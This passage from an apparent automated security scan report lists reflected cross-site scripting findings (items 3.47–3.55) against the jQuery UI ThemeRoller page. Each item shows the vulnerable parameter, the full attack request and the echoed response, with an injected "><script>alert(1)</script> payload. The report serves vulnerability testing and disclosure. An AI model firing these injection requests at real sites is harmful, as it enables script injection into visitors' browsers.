User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7pxefcfe"><script>alert(1)</script>d490bc83fc4&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.47. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c97b"><script>alert(1)</script>605cd6750bd was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*9c97b"><script>alert(1)</script>605cd6750bd HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
y=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*9c97b"><script>alert(1)</script>605cd6750bd" type="text/css" media="all" />
...[SNIP]...

3.48. http://jqueryui.com/themeroller/ [fcActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c53"><script>alert(1)</script>42cd52ca697 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC75c53"><script>alert(1)</script>42cd52ca697&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC75c53"><script>alert(1)</script>42cd52ca697&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=F
...[SNIP]...

3.49. http://jqueryui.com/themeroller/ [fcContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b577"><script>alert(1)</script>b9dabb1f883 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=6666661b577"><script>alert(1)</script>b9dabb1f883&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=6666661b577"><script>alert(1)</script>b9dabb1f883&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTex
...[SNIP]...

3.50. http://jqueryui.com/themeroller/ [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c2eb"><script>alert(1)</script>b514358f553 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF3c2eb"><script>alert(1)</script>b514358f553&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF3c2eb"><script>alert(1)</script>b514358f553&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=
...[SNIP]...

3.51. http://jqueryui.com/themeroller/ [fcError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5b02"><script>alert(1)</script>bc2004c518 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000d5b02"><script>alert(1)</script>bc2004c518&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000d5b02"><script>alert(1)</script>bc2004c518&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=1
...[SNIP]...

3.52. http://jqueryui.com/themeroller/ [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20da2"><script>alert(1)</script>824c2520339 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF20da2"><script>alert(1)</script>824c2520339&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF20da2"><script>alert(1)</script>824c2520339&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefa
...[SNIP]...

3.53. http://jqueryui.com/themeroller/ [fcHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4833c"><script>alert(1)</script>da123611499 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=3333334833c"><script>alert(1)</script>da123611499&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=3333334833c"><script>alert(1)</script>da123611499&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_fl
...[SNIP]...

3.54. http://jqueryui.com/themeroller/ [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8da82"><script>alert(1)</script>6ab60c147ab was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF8da82"><script>alert(1)</script>6ab60c147ab&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
OpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF8da82"><script>alert(1)</script>6ab60c147ab&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHig
...[SNIP]...

3.55. http://jqueryui.com/themeroller/ [ffDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdcf"><script>alert(1)</script>709d73031ae was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-seriffbdcf"><script>alert(1)</script>709d73031ae&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
